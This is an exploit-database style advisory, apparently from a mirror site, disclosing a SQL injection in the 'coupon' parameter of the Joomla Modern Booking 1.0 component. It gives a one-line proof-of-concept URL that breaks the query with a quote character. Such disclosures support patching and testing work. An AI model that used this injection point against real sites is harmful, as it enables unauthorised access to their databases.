[] NeoSense

Joomla! Component Modern Booking 1.0 - 'coupon' SQL Injection

Author: Hamed Izadi
type: webapps
platform: php
port: 
date_added: 2017-03-23 
date_updated: 2017-03-23 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################################################
# Exploit Title: Joomla Modern Booking  - SQL Injection

               # Author: [ Hamed Izadi ]

                        #IRAN

# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017


# PoC:
# coupon Parameter Vulnerable To SQLi

# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking


#  L u Arg
###############################################################################################